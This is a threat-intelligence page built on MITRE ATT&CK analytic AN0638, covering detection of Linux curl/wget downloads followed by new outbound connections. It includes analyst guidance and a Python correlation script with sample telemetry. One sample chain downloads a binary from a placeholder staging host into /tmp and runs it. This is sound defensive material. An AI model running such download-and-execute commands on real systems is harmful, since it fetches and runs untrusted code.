MITRE ATT&CK® Analytic

AN0638: Analytic 0638

Shell script or binary initiates curl/wget request to staging domain, writes output to disk or memory, and shortly afterward launches another process that establishes new outbound connection to a different IP or hostname.

Enterprise · AN0638 · Analytic · Object version 1.0
Glexia's Take

Analyst context for executives and security teams

Analyst confidence: Medium

This analytic describes a Linux post-download execution pattern: a script or binary retrieves content with curl or wget from a staging domain, writes it to disk or memory, and soon after starts another process that makes an outbound connection to a different destination. For leaders, the value is in validating whether security teams can connect download activity, process launch, and network egress into one investigation story rather than reviewing each event in isolation.

Executive priority

Prioritize this as a control-validation and SOC-readiness question for Linux environments: can the organization prove it sees command-line download tools, file or memory write behavior, child process creation, and follow-on outbound connections? This matters for incident triage, containment decisions, audit evidence around monitoring coverage, and reducing blind spots on servers or workloads where Linux telemetry is often thinner than endpoint telemetry on user devices.

Technical view

SOC and detection teams should validate correlation on Linux between shell scripts or binaries invoking curl or wget, output being written to disk or memory, and a process launched shortly afterward that establishes a new outbound connection to a different IP or hostname. Because ATT&CK supplies no tactic mapping, no detection logic, and no relationships, teams should treat this as a behavior pattern to operationalize locally rather than as a complete rule. The key engineering work is defining the time window, parent-child process linkage, command-line capture quality, destination-change logic, and the approved administrative or automation use cases that may create false positives.

Likely telemetry

  • Linux process execution events with parent-child relationships
  • Command-line arguments showing curl or wget usage
  • File creation or write events where available
  • Memory execution or in-memory load indicators where available
  • Outbound network connection metadata from host, EDR, firewall, proxy, DNS, or network sensors

Detection direction

  • Confirm Linux endpoints or servers actually collect process command lines and parent-child process relationships; without this, the analytic loses much of its value.
  • Correlate curl/wget download activity with subsequent process launch and new outbound connection to a different IP or hostname within a defined short time window.
  • Tune for legitimate software deployment, patching, backup, monitoring, CI/CD, and administrative scripts that commonly use curl or wget.
  • Validate visibility for both disk writes and cases where output may be handled in memory, noting that memory-level evidence may not be consistently available.
  • Use destination context to separate expected repositories, package mirrors, and internal services from unusual staging domains or unexpected egress paths.
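The correlation described in the Technical view and the Detection direction list above, worked through as an added example; this is not detection content from MITRE or from the Glexia page. It assumes a sensor that emits process-start events (timestamp, pid, ppid, full command line) and outbound-connection events (timestamp, pid, destination, port); the event field names, the 120-second window, the allowlist of approved sources, and all sample events are constructed for illustration.

```python
"""Correlate curl/wget fetches with follow-on sibling process launch and egress (added example)."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from urllib.parse import urlparse
import shlex


@dataclass(frozen=True)
class ProcEvent:
    ts: datetime   # process start time (assumed sensor field)
    pid: int
    ppid: int      # parent pid: the shell script or binary that spawned it
    cmdline: str   # full command line as captured by the sensor


@dataclass(frozen=True)
class NetEvent:
    ts: datetime   # time the outbound connection was observed (assumed sensor field)
    pid: int       # process that opened the connection
    dest: str      # destination hostname or IP as logged
    port: int


DOWNLOADERS = {"curl", "wget"}
CURL_OUTPUT_FLAGS = {"-o", "-O", "--output", "--remote-name"}


def parse_download(cmdline):
    """If cmdline is a curl/wget fetch, return (staging_host, writes_to_disk); else None.
    Only whole-token flags are recognised; combined short flags such as -sSLo are a known gap."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:
        return None
    if not argv or argv[0].rsplit("/", 1)[-1] not in DOWNLOADERS:
        return None
    tool = argv[0].rsplit("/", 1)[-1]
    host = next((urlparse(t).hostname for t in argv[1:] if "://" in t), None)
    if not host:
        return None
    if tool == "wget":
        # wget saves to a file by default; "-O -" or "-O-" sends the body to stdout instead
        to_stdout = "-O-" in argv or "--output-document=-" in argv or any(
            a == "-O" and b == "-" for a, b in zip(argv, argv[1:]))
        writes_to_disk = not to_stdout
    else:
        # curl writes to stdout (the in-memory case) unless an output flag is given
        writes_to_disk = any(t in CURL_OUTPUT_FLAGS or t.startswith("--output=") for t in argv[1:])
    return host.lower(), writes_to_disk


def correlate(procs, nets, window=timedelta(seconds=120), allowed_sources=frozenset()):
    """One hit per (download, sibling process, connection) triple matching the analytic: a curl/wget
    fetch from a staging host, then within `window` another process under the same parent connects
    to a destination other than the staging host. Hosts in allowed_sources are skipped for tuning."""
    hits = []
    for dl in procs:
        parsed = parse_download(dl.cmdline)
        if parsed is None:
            continue
        staging, to_disk = parsed
        if staging in allowed_sources:
            continue
        deadline = dl.ts + window
        for child in procs:
            # siblings: same parent as the downloader, started after it, inside the window
            if child.ppid != dl.ppid or child.pid == dl.pid or not dl.ts <= child.ts <= deadline:
                continue
            for conn in nets:
                if conn.pid != child.pid or not child.ts <= conn.ts <= deadline:
                    continue
                if conn.dest.lower() == staging:
                    continue  # same destination: not the "different IP or hostname" pattern
                hits.append({
                    "parent_pid": dl.ppid, "download_pid": dl.pid, "staging": staging,
                    "output": "disk" if to_disk else "stdout/memory",
                    "child_pid": child.pid, "child_cmd": child.cmdline,
                    "egress": conn.dest, "egress_port": conn.port,
                    "delta_s": (conn.ts - dl.ts).total_seconds(),
                })
    return hits


# Constructed sample telemetry: one suspicious chain (deploy.sh), one patching chain (patch.sh).
T0 = datetime(2024, 1, 1, 12, 0, 0)
SAMPLE_PROCS = [
    ProcEvent(T0, 100, 1, "/bin/bash /opt/deploy.sh"),
    ProcEvent(T0 + timedelta(seconds=1), 101, 100, "curl -s -o /tmp/stage.bin http://stage.example.test/a.bin"),
    ProcEvent(T0 + timedelta(seconds=5), 102, 100, "/tmp/stage.bin"),
    ProcEvent(T0 + timedelta(minutes=30), 103, 100, "/usr/bin/rsync -a /srv/data backup.example.test:/srv/data"),
    ProcEvent(T0, 200, 1, "/bin/bash /usr/local/bin/patch.sh"),
    ProcEvent(T0 + timedelta(seconds=2), 201, 200, "wget -O /tmp/pkg.deb http://mirror.example.test/pkg.deb"),
    ProcEvent(T0 + timedelta(seconds=4), 202, 200, "apt-get install -y /tmp/pkg.deb"),
]
SAMPLE_NETS = [
    NetEvent(T0 + timedelta(seconds=1), 101, "stage.example.test", 80),
    NetEvent(T0 + timedelta(seconds=6), 102, "203.0.113.10", 443),        # different host, in window
    NetEvent(T0 + timedelta(minutes=30, seconds=1), 103, "198.51.100.7", 873),  # outside window
    NetEvent(T0 + timedelta(seconds=2), 201, "mirror.example.test", 80),
    NetEvent(T0 + timedelta(seconds=5), 202, "security.example.test", 80),  # benign unless allowlisted
]


def run_sample(allowed_sources=frozenset()):
    return correlate(SAMPLE_PROCS, SAMPLE_NETS, allowed_sources=allowed_sources)


if __name__ == "__main__":
    for hit in run_sample(allowed_sources=frozenset({"mirror.example.test"})):
        print(hit)
```

Without an allowlist the sample yields two hits, because the patching script also fetches from one host and then contacts another; adding the package mirror to `allowed_sources` leaves only the deploy.sh chain, which is the tuning step the Detection direction list calls out. The sibling-process linkage via `ppid` is one reasonable reading of "launches another process"; environments where the downloaded binary is exec'd from a sub-shell would need to walk the process tree rather than match a single parent.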

Mitigation priorities

  • Inventory where Linux systems are allowed to use curl or wget and where outbound internet access is business-justified.
  • Restrict unnecessary egress from Linux servers and workloads using network controls appropriate to the environment.
  • Standardize approved software retrieval and deployment paths so exceptions are easier to detect.
  • Improve Linux endpoint and network telemetry before relying on this analytic for incident response decisions.
  • Document expected administrative automation patterns to support SOC tuning and compliance evidence.

Analyst notes and limits

The supplied object is an ATT&CK detection analytic, not a technique, and it has no relationship context or tactic assignment. Its defensive value is strongest as a correlation pattern across Linux process, file or memory write, and outbound network telemetry. Local baselining is important because curl and wget are common legitimate tools.

Official detection content is not provided, and no related techniques, groups, campaigns, mitigations, or data components were supplied. This take does not infer attribution, active exploitation, impact, or guaranteed detection coverage. Applicability is limited to the supplied platform: Linux.

Official MITRE ATT&CK definition

Analytic 0638

Shell script or binary initiates curl/wget request to staging domain, writes output to disk or memory, and shortly afterward launches another process that establishes new outbound connection to a different IP or hostname.


Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, the table can be used to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.

ATT&CK release: 19.1
Object version: 1.0
Created:
Modified:
Raw hash: 3726b58b740333ea...

Imported snapshots across ATT&CK releases (1)

Release | Bundle imported | Object version | Modified | Status | Raw hash
19.1 | | 1.0 | | Current bundle | 3726b58b7403…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. mitre-attack AN0638
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.